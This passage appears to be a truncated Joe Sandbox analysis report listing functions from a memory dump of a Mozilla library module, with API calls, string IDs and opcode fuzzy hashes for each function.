                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 2950001534-1351931279
                                                                  • Opcode ID: 29039da5dfb41047593cab579e16018c3db6cb76f7830909b64475fb191966b5
                                                                  • Instruction ID: 98701b54d468b7fb9f09e4616f4389b0237ccceeee05bb678cba3ffd5b5e0217
                                                                  • Opcode Fuzzy Hash: 29039da5dfb41047593cab579e16018c3db6cb76f7830909b64475fb191966b5
                                                                  • Instruction Fuzzy Hash: CB727A72A097118FD304CF2DC540615FBE1BF89329F29C66DE8699BB92D335E846CB84
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__aullrem
                                                                  • String ID: -Infinity$NaN
                                                                  • API String ID: 3839614884-2141177498
                                                                  • Opcode ID: 7fdc79c1a7c3e06c9313a7734d477d0b8bef83ae61520ae52db93d9a6e660505
                                                                  • Instruction ID: 01c5b72a193fd4e867f436d0ed1f84c38a413ea25b192cfbd855982419c59a13
                                                                  • Opcode Fuzzy Hash: 7fdc79c1a7c3e06c9313a7734d477d0b8bef83ae61520ae52db93d9a6e660505
                                                                  • Instruction Fuzzy Hash: 88C1C471E043188BDB14CF98C8507EEB7B6AF85308FA44529D405ABB81D771A94ACBA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $-$0$0$1$8$9$@
                                                                  • API String ID: 0-3654031807
                                                                  • Opcode ID: dc1cb7962ecd61116f68760b897fca3a02036b7007a902ef0a1d586c7f57e682
                                                                  • Instruction ID: c3e41984229f65c2e12faebc33cc77faa15620809dcb03e8495ffb1db82217d9
                                                                  • Opcode Fuzzy Hash: dc1cb7962ecd61116f68760b897fca3a02036b7007a902ef0a1d586c7f57e682
                                                                  • Instruction Fuzzy Hash: CB62AC7150D3458FD709CE29C89076EBBF2AF86358F184A1DE4F54BA91D3359886CF82
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C668A4B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: ~q_l
                                                                  • API String ID: 2221118986-2259707452
                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction ID: c61bb01ac86666256532f3361b5c281806fa5165e840756b6009ada1eef9ecef
                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction Fuzzy Hash: 6FB11C72E0021ACFCB14CF69CC917D8B7B6EF85314F1402A9C949EBB91D730A985CB95
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C6688F0
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C66925C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: ~q_l
                                                                  • API String ID: 2221118986-2259707452
                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction ID: 5e522bed8f881c606318742a025a5d8748405c014b9871b720017804aaf6b22d
                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction Fuzzy Hash: FFB1D672E0420ACFCB14CF69CC816EDB7B6EF85314F140269C949EBB95D730A989CB95
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C65C0E9), ref: 6C65C418
                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C65C437
                                                                  • FreeLibrary.KERNEL32(?,6C65C0E9), ref: 6C65C44C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                  • API String ID: 145871493-2623246514
                                                                  • Opcode ID: fa5e4e6c6010e1c9bac1118438ee169e8c23ae57ac09d799f376f179277e83d2
                                                                  • Instruction ID: b45cf901aa6028a11bb373027968ebf37a38dbb4bc465c0330fbafb43b71e71b
                                                                  • Opcode Fuzzy Hash: fa5e4e6c6010e1c9bac1118438ee169e8c23ae57ac09d799f376f179277e83d2
                                                                  • Instruction Fuzzy Hash: 1AE09A70705321ABDB0A6BB3C988F117AF8A74A344F144915EA1591710EBB0C0118B7E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ' $0$0$1$9$@
                                                                  • API String ID: 0-2946122015
                                                                  • Opcode ID: 2513582998cf96b89e4edead8b5c8e532c2a461280d6d42e7f873254009b73fc
                                                                  • Instruction ID: 14adb65e53cb48a89f52f1975f288bca54ba52f16e99503cecf05c0c2a4ae62c
                                                                  • Opcode Fuzzy Hash: 2513582998cf96b89e4edead8b5c8e532c2a461280d6d42e7f873254009b73fc
                                                                  • Instruction Fuzzy Hash: 5382D431B093158BD719CF15C2402AEB7F2FB817C8F558A2DE8D567A92D3349886CB4A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv$__aullrem
                                                                  • String ID:
                                                                  • API String ID: 2022606265-0
                                                                  • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                  • Instruction ID: 2886bcd035435660ebb9fbcb8d55ebd45703054531a45fb79504f30c725de167
                                                                  • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                  • Instruction Fuzzy Hash: F2320432B046119FC718DE2CC890A5ABBE6AFC9350F09867DE4A5CB395D734ED06CB91
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C647A81
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C647A93
                                                                    • Part of subcall function 6C615C50: GetTickCount64.KERNEL32 ref: 6C615D40
                                                                    • Part of subcall function 6C615C50: EnterCriticalSection.KERNEL32(6C67F688), ref: 6C615D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C647AA1
                                                                    • Part of subcall function 6C615C50: __aulldiv.LIBCMT ref: 6C615DB4
                                                                    • Part of subcall function 6C615C50: LeaveCriticalSection.KERNEL32(6C67F688), ref: 6C615DED
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C647B31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                  • String ID:
                                                                  • API String ID: 4054851604-0
                                                                  • Opcode ID: ec2d07b5fba693af8968f652a02d164fd2fb61a11ec9d3492bf0b27f97b48ed6
                                                                  • Instruction ID: 09aae859e39622b360c94cad5fbf31c672e6266ce76ef8cd931cf24359b9f0d6
                                                                  • Opcode Fuzzy Hash: ec2d07b5fba693af8968f652a02d164fd2fb61a11ec9d3492bf0b27f97b48ed6
                                                                  • Instruction Fuzzy Hash: EEB16E356083818BDB14CF25C4506AFB7E2BFC5318F15CA1CE99567B91DB70E90ACB8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 0-3566792288
                                                                  • Opcode ID: 77b7f9730f77ee634be504a58efe1fb9762dba501a62dcd9fbff3a72d90e5afa
                                                                  • Instruction ID: c14ccfab1a14d333065058ef2d803abe12eae0992fc27e899ccacf2d31286fc7
                                                                  • Opcode Fuzzy Hash: 77b7f9730f77ee634be504a58efe1fb9762dba501a62dcd9fbff3a72d90e5afa
                                                                  • Instruction Fuzzy Hash: FAD28C71A096018FD708CF1DC590755BBE1BF85329F29C76DE86A8BBA5C731E841CB88
                                                                  APIs
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C636D45
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C636E1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                  • String ID:
                                                                  • API String ID: 4169067295-0
                                                                  • Opcode ID: 21ac065e2af6399d9a531bea46bf638d69b587c09cb31d93ae7af24830c02963
                                                                  • Instruction ID: e465af25b941b9815e36e65f3dc58891aa69ffc2140c6feb096bc942eafed9ee
                                                                  • Opcode Fuzzy Hash: 21ac065e2af6399d9a531bea46bf638d69b587c09cb31d93ae7af24830c02963
                                                                  • Instruction Fuzzy Hash: F0A18D706183908FD715CF25C4807AEFBE2BF89308F54991DE88A87751DB70E849CB9A
                                                                  APIs
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6C65B720
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C65B75A
                                                                  • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,6C640BA4,00000000,?,0000001C,?,?,00000000,?,6C638E44,?,00000000,?,6C640BA4), ref: 6C65B760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                  • String ID:
                                                                  • API String ID: 304294125-0
                                                                  • Opcode ID: 212dcd2c75f6ecf7f30470558d86f74ae033669ca4a008bcd84d43e19c69f93c
                                                                  • Instruction ID: 284fdc6ecea63b605d4a2977d4a53bc1ea2261cf2135d9ef2ff1d292f9b93b6a
                                                                  • Opcode Fuzzy Hash: 212dcd2c75f6ecf7f30470558d86f74ae033669ca4a008bcd84d43e19c69f93c
                                                                  • Instruction Fuzzy Hash: ABF0A47090020CAEDF019AA1CC84BDEB7BC9B44319F605169D512619C0D774959CCB6D
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C614777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 4275171209-1351931279
                                                                  • Opcode ID: 3019eb1f074045d422e5c6f7108d4855b5b0b6e951ed3e4fdfa4e4e0393fbbb6
                                                                  • Instruction ID: 799167270a878fbc5e272a9198eb9735479aa201f98f3617f48b43d61b007c58
                                                                  • Opcode Fuzzy Hash: 3019eb1f074045d422e5c6f7108d4855b5b0b6e951ed3e4fdfa4e4e0393fbbb6
                                                                  • Instruction Fuzzy Hash: A7B28E71A196018FC308CF1DC590725FBE2BFC5329B29C76DE4698BAA5D771E841CB88
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID:
                                                                  • API String ID: 3732870572-0
                                                                  • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                  • Instruction ID: 445903b6f88341094328aafa7c693a32263cec800cabcdb5bd7cac448c739737
                                                                  • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                  • Instruction Fuzzy Hash: 3E329371F501198BDF18CE9CC4A17AEF7B2FB88300F65813AD446BBBA0D6349D418B95
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ~q_l
                                                                  • API String ID: 0-2259707452
                                                                  • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                  • Instruction ID: c68cd939326917318b2e2f2416a754c99da5f7847f0ac9c05d1f41511c3eb1db
                                                                  • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                  • Instruction Fuzzy Hash: 2B321971E006198FCB14CF99C890AADFBF2FF88308F5481A9C549A7B45D731A986CF95
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ~q_l
                                                                  • API String ID: 0-2259707452
                                                                  • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                  • Instruction ID: 2275d89115ff11b46aef08566ef7a0b37a6af5834acaeb189e579ac880882343
                                                                  • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                  • Instruction Fuzzy Hash: 5B22F971E002198FCB14CF99C880AADF7F2FF89308F6485A9C549A7B45D731A986CF95
                                                                  APIs
                                                                  • memcmp.VCRUNTIME140(?,?,?,?,?), ref: 6C635F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: 0a6c18c0eda9e83278170eeb47a3b30de52e59dcc0d4ddd0ad836cb941bd2a1d
                                                                  • Instruction ID: bd0c13d255ab7c0942cf039749476a4f3a8f4d685ab008dfe702240d4d90fabf
                                                                  • Opcode Fuzzy Hash: 0a6c18c0eda9e83278170eeb47a3b30de52e59dcc0d4ddd0ad836cb941bd2a1d
                                                                  • Instruction Fuzzy Hash: 9BC1E175D012298BCB04CF95C5906EEBBF2FF8A318F28615DC8596BB40D732A906CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52a72dcde1736b2b22b89e58fa99ddf19f90588291d648683e31c051ce2003c1
                                                                  • Instruction ID: 9be0a039574c0c48d4d74f17fa38fd52817938d3dd947a3e4936aa0c6f0877fb
                                                                  • Opcode Fuzzy Hash: 52a72dcde1736b2b22b89e58fa99ddf19f90588291d648683e31c051ce2003c1
                                                                  • Instruction Fuzzy Hash: 8842D832A087508BD308CE3DC89075AF3E2BFC9354F154B2DE9A9A7791D774D9428B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                  • Instruction ID: 4d77cd1b393ee2fcc2bab5e12bc8b7031151f049d4de9e5199cc5c47f43072ce
                                                                  • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                  • Instruction Fuzzy Hash: 5A221775E04619CFCB14CF98C890AADF7B2FF89308F548299C54AA7705D735A986CF84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: afa16a0ab97fbd3d65b5f37d4a8839a450d9d39e3f621b52aba29281ed90d268
                                                                  • Instruction ID: 777727c9c8a38003e2f4ad1ab3f61e993e5cb4e30fe6ac8ead2a2e3a626fd543
                                                                  • Opcode Fuzzy Hash: afa16a0ab97fbd3d65b5f37d4a8839a450d9d39e3f621b52aba29281ed90d268
                                                                  • Instruction Fuzzy Hash: 73F15B716083559FD700CE2AC8903AAB7E2AFC6318F148A2DE5D587F82E774D845C797
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
